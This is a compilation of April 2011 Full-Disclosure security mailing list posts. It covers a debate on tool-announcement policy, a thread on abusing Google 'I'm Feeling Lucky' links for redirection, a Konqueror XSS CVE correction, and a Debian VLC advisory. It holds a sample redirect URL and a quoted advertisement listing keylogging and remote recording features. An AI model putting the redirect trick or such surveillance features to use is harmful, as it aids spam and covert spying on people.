[Christopher Truncer]

I agree with Steve. I joined this list for learning about the latest security 
vulnerabilities. It is a great method of staying current with everything going 
on in the IT Sec world. I think I can speak for some people saying we did not 
join to have a "free but donation required" tool promoted every 3 weeks.

On Apr 12, 2011, at 8:23 AM, Steven Pinkham  wrote:

> I agree this is a discussion worth having.  I think the policy should be
> more objective to give us a clear policy to abide by and enforce.
> 
> Suggestions for policy:
> 1)No tool announcements.
> Best rational I can think of for this one: Tool announcments should go
> to the specific group they are for. Pentest, webappsec, etc are all
> better places for announcements.
> 
> 2)Only announcements for OSI approved projects.  Webappsec has this
> policy I think, and it rewards people who share the most openly.
> 
> 3)Announcements for only no-cost projects.  Similar to the above
> 
> 4)Announcements for initial and major feature releases only, with a
> limit of 1 announcement per x months(3,6,12- whatever we deem reasonable
> as an upper bound.  I think one of the lists has this policy, and it
> seems the most reasonable one to me.
> 
> Steve
> Pete Smith wrote:
>> John,
>> 
>> The following line is within the list charter: Alterations will be made
>> after consultation with list members and a consensus has been reached. 
>> 
>> I would like to suggest that advertising for products and tools (free or
>> otherwise) be limited to just an initial announcement to tell people
>> about the tool. 
>> Sending updates for every single minor update made is just useless spam
>> for the majority of people seeing it, the people who are interested in a
>> product beyond the initial announcement can and will keep upto date on
>> changes themselves.
>> 
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> 
>> Cheers,
>> Pete
>> 
> 
> 
> -- 
> | Steven Pinkham, Security Consultant|
> | http://www.mavensecurity.com   |
> | GPG public key ID CD31CAFB |
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[Cal Leeming]

Didn't seem to wrok for me:

http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage
  +refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b

On Tue, Apr 12, 2011 at 4:05 AM, Leon Kaiser  wrote:

>  I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a practical
> use for it?
>
> 
> *Leon Kaiser*  - Head of GNAA Public Relations -
> litera...@gnaa.eu || litera...@goatse.fr
>http://gnaa.eu || http://security.goatse.fr
>   7BEECD8D FCBED526 F7960173 459111CE 
> F01F9923
> "The mask of anonymity is not intensely constructive."
>-- Andrew "weev" Auernheimer
> 
>
>   On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:
>
> Thanks for that Nick , good to know , but unfortunately it's still
> exploitable in 2011 :)
>
>  On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald <
> n...@virus-l.demon.co.uk> wrote:
>
>  satyam pujari wrote:
>
> > Here is a simple Google's "I'm Feeling Lucky" search feature exploitation
> > scenario.
>
>   > [...]
>
> Yawn...
>
> That's _so_ 2007!
>
>   http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
>
> ...and I seriously doubt that was the first time it was done, just when
> _I_ happened to make a note of it being actively abused in spam.
>
> All that other stuff about free hosting sites and IFrames on
> blogger.com is unnecessary implementation detail that can be achieved
> multitudinous ways.
>
>
>
> Regards,
>
> Nick FitzGerald
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Medium severity flaw in Konqueror

[Tim Brown]

On Tuesday 12 April 2011 03:36:24 Vincent Danen wrote:
> * [2011-04-11 22:07:24 +0100] Tim Brown wrote:
> >I was recently taking a look at Konquerer and spotted an example of
> >universal XSS.  Essentially, the error page displayed when a requested
> >URL is not available includes said URL.  If said URL includes HTML
> >fragments these will be rendered.  CVE-2010-2952 has been assigned to
> >this issue.
> 
> Actually, CVE-2011-1168 was assigned to this issue as noted in the
> upstream advisory:
> 
> http://www.kde.org/info/security/advisory-20110411-1.txt

Hi Vincent,

You're quite right, not sure how the wrong CVE ended up in the email.  That's 
a different CVE for another of my advisories :/.

Tim
-- 
Tim Brown




signature.asc
Description: This is a digitally signed message part.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2218-1] vlc security update

[Nico Golde]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2218-1   secur...@debian.org
http://www.debian.org/security/Nico Golde
April 12, 2011 http://www.debian.org/security/faq
- -

Package: vlc
Vulnerability  : heap-based buffer overflow
Problem type   : local
Debian-specific: no
CVE ID : none yet

Aliz Hammond discovered that the MP4 decoder plugin of vlc, a multimedia
player and streamer, is vulnerable to a heap-based buffer overflow.
This has been introduced by a wrong data type being used for a size
calculation.  An attacker could use this flaw to trick a victim into
opening a specially crafted MP4 file and possibly execute arbitrary code
or crash the media player.


The oldstable distribution (lenny) is not affected by this problem.

For the stable distribution (squeeze), this problem has been fixed in
version 1.1.3-1squeeze5.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.8-3.


We recommend that you upgrade your vlc packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk2kQQgACgkQHYflSXNkfP9KhQCeIMouwisbaIRQji7lU1YTugpU
j1EAn2/iB3jEH4k2ns4c0AKXZgy8IgIn
=uVBg
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[phil]

Just keep that simple, the post hit the non acceptable content.

"Gratuitous advertisement, product placement, or self-promotion is forbidden."



My opinion, but if the product could be free, like it was, then I  
don't mind seeing those kind of post, but for anything commercial FD  
is not there for that.



-phil

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[Nick FitzGerald]

Leon Kaiser wrote:

> I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a
> practical use for it?

Putting a Referer check on "I'm Feeling Lucky" was suggested back 
in/around September 2007, but as it still works from anywhere, you can 
see how much Google-oids really take the company's "do not facilitate 
the less than desirable" to heart...



Regards,

Nick FitzGerald


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[Steven Pinkham]

I agree this is a discussion worth having.  I think the policy should be
more objective to give us a clear policy to abide by and enforce.

Suggestions for policy:
1)No tool announcements.
Best rational I can think of for this one: Tool announcments should go
to the specific group they are for. Pentest, webappsec, etc are all
better places for announcements.

2)Only announcements for OSI approved projects.  Webappsec has this
policy I think, and it rewards people who share the most openly.

3)Announcements for only no-cost projects.  Similar to the above

4)Announcements for initial and major feature releases only, with a
limit of 1 announcement per x months(3,6,12- whatever we deem reasonable
as an upper bound.  I think one of the lists has this policy, and it
seems the most reasonable one to me.

Steve
Pete Smith wrote:
> John,
> 
> The following line is within the list charter: Alterations will be made
> after consultation with list members and a consensus has been reached. 
> 
> I would like to suggest that advertising for products and tools (free or
> otherwise) be limited to just an initial announcement to tell people
> about the tool. 
> Sending updates for every single minor update made is just useless spam
> for the majority of people seeing it, the people who are interested in a
> product beyond the initial announcement can and will keep upto date on
> changes themselves.
> 
> http://lists.grok.org.uk/full-disclosure-charter.html
> 
> Cheers,
> Pete
> 


-- 
 | Steven Pinkham, Security Consultant|
 | http://www.mavensecurity.com   |
 | GPG public key ID CD31CAFB |


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[david.kl...@ipfocus.com.au]

Bing?


--- Original Message ---
>From: Leon Kaiser[mailto:litera...@gmail.com]
Sent: 4/12/2011 1:05:37 PM
To  : full-disclosure@lists.grok.org.uk
Cc  : 
Subject : RE: Re: [Full-disclosure] Google Search Feature Exploitation Scenario

 I don't see why people are able to directly link to "I'm Feeling Lucky"
Google search results in the first place. Can anyone think of a
practical use for it?


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
http://gnaa.eu  ||  http://security.goatse.fr 
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer
 

On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:

> Thanks for that Nick , good to know , but unfortunately it's still
> exploitable in 2011 :)
> 
> 
> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald
>  wrote:
> 
> satyam pujari wrote:
> 
> > Here is a simple Google's "I'm Feeling Lucky" search feature
> exploitation
> > scenario.
> 
> 
> > [...]
> 
> Yawn...
> 
> That's _so_ 2007!
> 
> 
>  http://www.virusbtn.com/resources/spammerscompendium/lucky.xml 
> 
> ...and I seriously doubt that was the first time it was done,
> just when
> _I_ happened to make a note of it being actively abused in
> spam.
> 
> All that other stuff about free hosting sites and IFrames on
> blogger.com is unnecessary implementation detail that can be
> achieved
> multitudinous ways.
> 
> 
> 
> Regards,
> 
> Nick FitzGerald
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:  http://lists.grok.org.uk/full-disclosure-charter.html 
> Hosted and sponsored by Secunia -  http://secunia.com/ 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:  http://lists.grok.org.uk/full-disclosure-charter.html 
> Hosted and sponsored by Secunia -  http://secunia.com/ 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[Leon Kaiser]

I don't see why people are able to directly link to "I'm Feeling Lucky"
Google search results in the first place. Can anyone think of a
practical use for it?


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer
 

On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:

> Thanks for that Nick , good to know , but unfortunately it's still
> exploitable in 2011 :)
> 
> 
> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald
>  wrote:
> 
> satyam pujari wrote:
> 
> > Here is a simple Google's "I'm Feeling Lucky" search feature
> exploitation
> > scenario.
> 
> 
> > [...]
> 
> Yawn...
> 
> That's _so_ 2007!
> 
> 
> http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
> 
> ...and I seriously doubt that was the first time it was done,
> just when
> _I_ happened to make a note of it being actively abused in
> spam.
> 
> All that other stuff about free hosting sites and IFrames on
> blogger.com is unnecessary implementation detail that can be
> achieved
> multitudinous ways.
> 
> 
> 
> Regards,
> 
> Nick FitzGerald
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5.1 released

[Michal Zalewski]

> I would like to suggest that advertising for products and tools (free or
> otherwise) be limited to just an initial announcement to tell people about
> the tool.

Meh. Most authors keep the volume of their announcements low, and only
highlight genuinely interesting updates. I think it's beneficial to
allow this.

Maybe highlighting the importance of these two qualities is the way to go?

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5.1 released

[Pete Smith]

John,

The following line is within the list charter: Alterations will be made
after consultation with list members and a consensus has been reached.

I would like to suggest that advertising for products and tools (free or
otherwise) be limited to just an initial announcement to tell people about
the tool.
Sending updates for every single minor update made is just useless spam for
the majority of people seeing it, the people who are interested in a product
beyond the initial announcement can and will keep upto date on changes
themselves.

http://lists.grok.org.uk/full-disclosure-charter.html

Cheers,
Pete

On 12 April 2011 09:20, runlvl  wrote:

> INSECT Pro 2.5 new version is now accessible on Insecurity Research servers
>
> Get it now to enjoy the positive changes that this update brings,
> based directly on user feedback
>
> INSECT Pro is the ultimate resource to demonstrate the security—or
> vulnerability—of your network. INSECT goes beyond simply detecting
> vulnerabilities to safely exploiting them. 100 native exploits added.
>
> Version 2.5.1 includes:
> User friendly GUI improved
> Minimize to systray to work in background
> Remote Video recording
> Remote Mic recording
> Capture screenshots
> Metasploit ( modules - exploits ) support
> Keylogging feature
> Command line based control
> Web Scanner
> SQL Injection and HTTP fuzzer
> And more than 150+ native exploits
>
> Thanks to the core developers and everyone else who contributed.
>
> Get a copy now from: http://www.insecurityresearch.com
>
> Juan Sacco
> --
> _
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5.1 was released stay tunned
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/